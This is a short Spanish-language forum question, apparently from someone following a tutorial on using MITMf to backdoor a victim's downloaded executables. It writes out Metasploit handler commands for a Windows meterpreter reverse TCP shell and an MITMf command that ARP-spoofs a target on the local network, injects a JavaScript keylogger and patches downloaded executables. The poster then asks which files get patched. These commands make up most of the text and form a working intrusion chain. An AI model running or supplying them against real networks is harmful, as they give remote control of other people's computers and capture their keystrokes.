De este tutorial encontré que es posible usar herramienta MITMf para parchar descargas de archivos 'ex' 'víctima' 'con el fin de abrir un shell meterpreter. Los comandos que se han utilizado son los siguientes:
use exploit/multi/handler
set payloads windows/metepreter/reverse_tcp
set lhost 192.168.1.4
set lport 4888
exploit
para abrir meterpreter y
mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger --filepwn
El problema es que no corrige todos los archivos ejecutables como se menciona en el tutorial también. Entonces, la pregunta es: ¿qué archivos se parchean y cuáles no?